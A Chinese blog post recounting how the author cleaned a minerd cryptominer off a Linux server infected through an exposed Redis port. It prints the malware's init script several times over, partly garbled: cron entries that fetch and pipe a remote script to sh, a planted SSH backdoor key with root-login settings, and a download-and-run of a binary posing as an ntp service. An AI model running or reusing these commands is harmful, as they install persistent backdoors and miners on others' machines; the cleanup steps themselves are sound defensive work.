linux中了minerd之后的完全清理过程(详解)
一不小心装了一个Redis服务,开了一个全网的默认端口,一开始以为这台服务器没有公网ip,结果发现之后悔之莫及啊
某天发现cpuload高的出奇,发现一个minerd进程占了大量cpu,google了一下,发现自己中招了
下面就是清理过程
第一步
1.立即停止 Redis 服务;限制端口的访问范围(只绑定内网地址,或用防火墙限制来源),并设置访问密码(requirepass)
2.按照网上的资料删除 crontab 里的两个文件
sudo rm /var/spool/cron/root
sudo rm /var/spool/cron/crontabs/root
3.知己知彼,百战不殆,研究病毒的初始化文件(下面是多次翻页截下来的同一个脚本,最后一份是完整内容)
exportPATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo"*/10****curl-fsSLhttp://r.chanstring.com/pm.sh?0706|sh">/var/spool/cron/root
mkdir-p/var/spool/cron/crontabs
echo"*/10****curl-fsSLhttp://r.chanstring.com/pm.sh?0706|sh">/var/spool/cron/crontabs/root
if[!-f"/root/.ssh/KHK75NEOiq"];then
mkdir-p~/.ssh
rm-f~/.ssh/authorized_keys*
echo"ssh-rsaAAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ7yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y993qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFavroot">~/.ssh/KHK75NEOiq
echo"PermitRootLoginyes">>/etc/ssh/sshd_config
echo"RSAAuthenticationyes">>/etc/ssh/sshd_config
echo"PubkeyAuthenticationyes">>/etc/ssh/sshd_config
echo"AuthorizedKeysFile.ssh/KHK75NEOiq">>/etc/ssh/sshd_config
/etc/init.d/sshdrestart
exportPATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo"*/10****curl-fsSLhttp://r.chanstring.com/pm.sh?0706|sh">/var/spooll
/cron/root
mkdir-p/var/spool/cron/crontabs
echo"*/10****curl-fsSLhttp://r.chanstring.com/pm.sh?0706|sh">/var/spooll
/cron/crontabs/root
if[!-f"/root/.ssh/KHK75NEOiq"];then
mkdir-p~/.ssh
rm-f~/.ssh/authorized_keys*
echo"ssh-rsaAAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITT
shREwOc9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZZ
7yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kvv
9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1yy
993qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFavroot">~/.ssh/KHK755
NEOiq
echo"PermitRootLoginyes">>/etc/ssh/sshd_config
echo"RSAAuthenticationyes">>/etc/ssh/sshd_config
echo"PubkeyAuthenticationyes">>/etc/ssh/sshd_config
echo"AuthorizedKeysFile.ssh/KHK75NEOiq">>/etc/ssh/sshd_config
/etc/init.d/sshdrestart
exportPATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo"*/10****curl-fsSLhttp://r.chanstring.com/pm.sh?0706|sh">/var/spool/cron/rr
oot
mkdir-p/var/spool/cron/crontabs
echo"*/10****curl-fsSLhttp://r.chanstring.com/pm.sh?0706|sh">/var/spool/cron/cc
rontabs/root
if[!-f"/root/.ssh/KHK75NEOiq"];then
mkdir-p~/.ssh
rm-f~/.ssh/authorized_keys*
echo"ssh-rsaAAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOcc
9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ7yEOWW/QPJEoXLL
Kn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm88
gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y993qHNytbEgN+9IZCWlHOnlEPxBrr
o4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFavroot">~/.ssh/KHK75NEOiq
echo"PermitRootLoginyes">>/etc/ssh/sshd_config
echo"RSAAuthenticationyes">>/etc/ssh/sshd_config
echo"PubkeyAuthenticationyes">>/etc/ssh/sshd_config
echo"AuthorizedKeysFile.ssh/KHK75NEOiq">>/etc/ssh/sshd_config
/etc/init.d/sshdrestart
fi
if[!-f"/etc/init.d/ntp"];then
exportPATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo"*/10****curl-fsSLhttp://r.chanstring.com/pm.sh?0706|sh">/var/spool/cron/root
mkdir-p/var/spool/cron/crontabs
echo"*/10****curl-fsSLhttp://r.chanstring.com/pm.sh?0706|sh">/var/spool/cron/crontabs/roo
ot
if[!-f"/root/.ssh/KHK75NEOiq"];then
mkdir-p~/.ssh
rm-f~/.ssh/authorized_keys*
echo"ssh-rsaAAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yWW
8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ7yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQQ
V8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXX
mVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y993qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFavroot""
>~/.ssh/KHK75NEOiq
echo"PermitRootLoginyes">>/etc/ssh/sshd_config
echo"RSAAuthenticationyes">>/etc/ssh/sshd_config
echo"PubkeyAuthenticationyes">>/etc/ssh/sshd_config
echo"AuthorizedKeysFile.ssh/KHK75NEOiq">>/etc/ssh/sshd_config
/etc/init.d/sshdrestart
fi
if[!-f"/etc/init.d/ntp"];then
if[!-f"/etc/systemd/system/ntp.service"];then
mkdir-p/opt
exportPATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo"*/10****curl-fsSLhttp://r.chanstring.com/pm.sh?0706|sh">/var/spool/cron/root
mkdir-p/var/spool/cron/crontabs
echo"*/10****curl-fsSLhttp://r.chanstring.com/pm.sh?0706|sh">/var/spool/cron/crontabs/root
if[!-f"/root/.ssh/KHK75NEOiq"];then
mkdir-p~/.ssh
rm-f~/.ssh/authorized_keys*
echo"ssh-rsaAAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yW8KgHYTKvIAk/AA
g1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ7yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txLL
6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y993qHNyy
tbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFavroot">~/.ssh/KHK75NEOiq
echo"PermitRootLoginyes">>/etc/ssh/sshd_config
echo"RSAAuthenticationyes">>/etc/ssh/sshd_config
echo"PubkeyAuthenticationyes">>/etc/ssh/sshd_config
echo"AuthorizedKeysFile.ssh/KHK75NEOiq">>/etc/ssh/sshd_config
/etc/init.d/sshdrestart
fi
if[!-f"/etc/init.d/ntp"];then
if[!-f"/etc/systemd/system/ntp.service"];then
mkdir-p/opt
curl-fsSLhttp://r.chanstring.com/v51/lady_`uname-m`-o/opt/KHK75NEOiq33&&chmod+x/opt/KHK77
5NEOiq33&&/opt/KHK75NEOiq33-Install
fi
fi
exportPATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo"*/10****curl-fsSLhttp://r.chanstring.com/pm.sh?0706|sh">/var/spool/cron/root
mkdir-p/var/spool/cron/crontabs
echo"*/10****curl-fsSLhttp://r.chanstring.com/pm.sh?0706|sh">/var/spool/cron/crontabs/root
if[!-f"/root/.ssh/KHK75NEOiq"];then
mkdir-p~/.ssh
rm-f~/.ssh/authorized_keys*
echo"ssh-rsaAAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TT
dRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ7yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6ww
L4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y993qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdd
Y7vRnrvFavroot">~/.ssh/KHK75NEOiq
echo"PermitRootLoginyes">>/etc/ssh/sshd_config
echo"RSAAuthenticationyes">>/etc/ssh/sshd_config
echo"PubkeyAuthenticationyes">>/etc/ssh/sshd_config
echo"AuthorizedKeysFile.ssh/KHK75NEOiq">>/etc/ssh/sshd_config
/etc/init.d/sshdrestart
fi
if[!-f"/etc/init.d/ntp"];then
if[!-f"/etc/systemd/system/ntp.service"];then
mkdir-p/opt
curl-fsSLhttp://r.chanstring.com/v51/lady_`uname-m`-o/opt/KHK75NEOiq33&&chmod+x/opt/KHK75NEOiq33&&/opp
t/KHK75NEOiq33-Install
fi
fi
/etc/init.d/ntpstart
psauxf|grep-vgrep|grep"/usr/bin/cron"|awk'{print$2}'|xargskill-9
exportPATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo"*/10****curl-fsSLhttp://r.chanstring.com/pm.sh?0706|sh">/var/spool/cron/root
mkdir-p/var/spool/cron/crontabs
echo"*/10****curl-fsSLhttp://r.chanstring.com/pm.sh?0706|sh">/var/spool/cron/crontabs/root
if[!-f"/root/.ssh/KHK75NEOiq"];then
mkdir-p~/.ssh
rm-f~/.ssh/authorized_keys*
echo"ssh-rsaAAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYY
pLJ53mzb1JpQVj+wZ7yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbb
BXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y993qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFavroot">~/.ssh/KHK75NEOiq
echo"PermitRootLoginyes">>/etc/ssh/sshd_config
echo"RSAAuthenticationyes">>/etc/ssh/sshd_config
echo"PubkeyAuthenticationyes">>/etc/ssh/sshd_config
echo"AuthorizedKeysFile.ssh/KHK75NEOiq">>/etc/ssh/sshd_config
/etc/init.d/sshdrestart
fi
if[!-f"/etc/init.d/ntp"];then
if[!-f"/etc/systemd/system/ntp.service"];then
mkdir-p/opt
curl-fsSLhttp://r.chanstring.com/v51/lady_`uname-m`-o/opt/KHK75NEOiq33&&chmod+x/opt/KHK75NEOiq33&&/opt/KHK75NEOiq33-Instaa
ll
fi
fi
/etc/init.d/ntpstart
psauxf|grep-vgrep|grep"/usr/bin/cron"|awk'{print$2}'|xargskill-9
psauxf|grep-vgrep|grep"/opt/cron"|awk'{print$2}'|xargskill-9
exportPATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo"*/10****curl-fsSLhttp://r.chanstring.com/pm.sh?0706|sh">/var/spool/cron/root
mkdir-p/var/spool/cron/crontabs
echo"*/10****curl-fsSLhttp://r.chanstring.com/pm.sh?0706|sh">/var/spool/cron/crontabs/root
if[!-f"/root/.ssh/KHK75NEOiq"];then
mkdir-p~/.ssh
rm-f~/.ssh/authorized_keys*
echo"ssh-rsaAAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ77
yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y999
3qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFavroot">~/.ssh/KHK75NEOiq
echo"PermitRootLoginyes">>/etc/ssh/sshd_config
echo"RSAAuthenticationyes">>/etc/ssh/sshd_config
echo"PubkeyAuthenticationyes">>/etc/ssh/sshd_config
echo"AuthorizedKeysFile.ssh/KHK75NEOiq">>/etc/ssh/sshd_config
/etc/init.d/sshdrestart
fi
if[!-f"/etc/init.d/ntp"];then
if[!-f"/etc/systemd/system/ntp.service"];then
mkdir-p/opt
curl-fsSLhttp://r.chanstring.com/v51/lady_`uname-m`-o/opt/KHK75NEOiq33&&chmod+x/opt/KHK75NEOiq33&&/opt/KHK75NEOiq33-Install
fi
fi
/etc/init.d/ntpstart
psauxf|grep-vgrep|grep"/usr/bin/cron"|awk'{print$2}'|xargskill-9
psauxf|grep-vgrep|grep"/opt/cron"|awk'{print$2}'|xargskill-9
分析结果如下
1.删除 crontab 的配置文件(上面已经删除)。这两个文件每 10 分钟重新拉取并执行 pm.sh,是病毒复活的根源,涉及的代码:
echo"*/10****curl-fsSLhttp://r.chanstring.com/pm.sh?0706|sh">/var/spool/cron/root mkdir-p/var/spool/cron/crontabs echo"*/10****curl-fsSLhttp://r.chanstring.com/pm.sh?0706|sh">/var/spool/cron/crontabs/root
2.删除病毒植入的、用来免密码登录的公钥文件
rm -f ~/.ssh/authorized_keys*
rm -f ~/.ssh/KHK75NEOiq
你甚至可以直接把 .ssh 这个目录删除掉(注意这会把自己原来的公钥一起删掉)。另外脚本还往 /etc/ssh/sshd_config 末尾追加了 PermitRootLogin yes、AuthorizedKeysFile .ssh/KHK75NEOiq 等几行,也要一并删掉并重启 sshd,否则这个后门公钥路径仍然生效
涉及的代码
if[!-f"/root/.ssh/KHK75NEOiq"];then mkdir-p~/.ssh rm-f~/.ssh/authorized_keys* echo"ssh-rsaAAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ77 yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y999 3qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFavroot">~/.ssh/KHK75NEOiq echo"PermitRootLoginyes">>/etc/ssh/sshd_config echo"RSAAuthenticationyes">>/etc/ssh/sshd_config echo"PubkeyAuthenticationyes">>/etc/ssh/sshd_config echo"AuthorizedKeysFile.ssh/KHK75NEOiq">>/etc/ssh/sshd_config /etc/init.d/sshdrestart fi
3.清理 /opt/ 目录。脚本用 mkdir -p /opt 创建它,并把第四步那个服务的可执行文件 KHK75NEOiq33 下载到这里
4.删除伪装成 ntp 的服务(脚本还检查了 /etc/systemd/system/ntp.service,用 systemd 的系统也要一并检查这个文件)
service ntp stop
rm /etc/init.d/ntp
rm /usr/sbin/ntp
涉及的代码
if[!-f"/etc/init.d/ntp"];then if[!-f"/etc/systemd/system/ntp.service"];then mkdir-p/opt curl-fsSLhttp://r.chanstring.com/v51/lady_`uname-m`-o/opt/KHK75NEOiq33&&chmod+x/opt/KHK75NEOiq33&&/opt/KHK75NEOiq33-Install fi fi
如上的代码下载了一个 8M 的程序,并用 -Install 参数运行了它。具体安装了什么楼主也不知道,但是接下来的代码暴露了行踪
/etc/init.d/ntp start
这行代码启动了 ntp 这个服务。百度搜了下说是个时间服务,其实这玩意是病毒伪装的服务:打开 /etc/init.d/ntp 这个文件,找到它指向的可执行文件 /usr/sbin/ntp,发现这个文件和那个 8M 的文件一个字节不差
所以删除这个文件
最后
ps aux | grep minerd
kill 掉所有的 minerd 进程,修复结束。注意顺序:要先删掉 crontab 文件、ntp 服务和下载的程序再 kill,否则上面那个每 10 分钟一次的定时任务会把矿机重新拉下来
半小时之后
ps aux | grep minerd
minerd 进程不再出现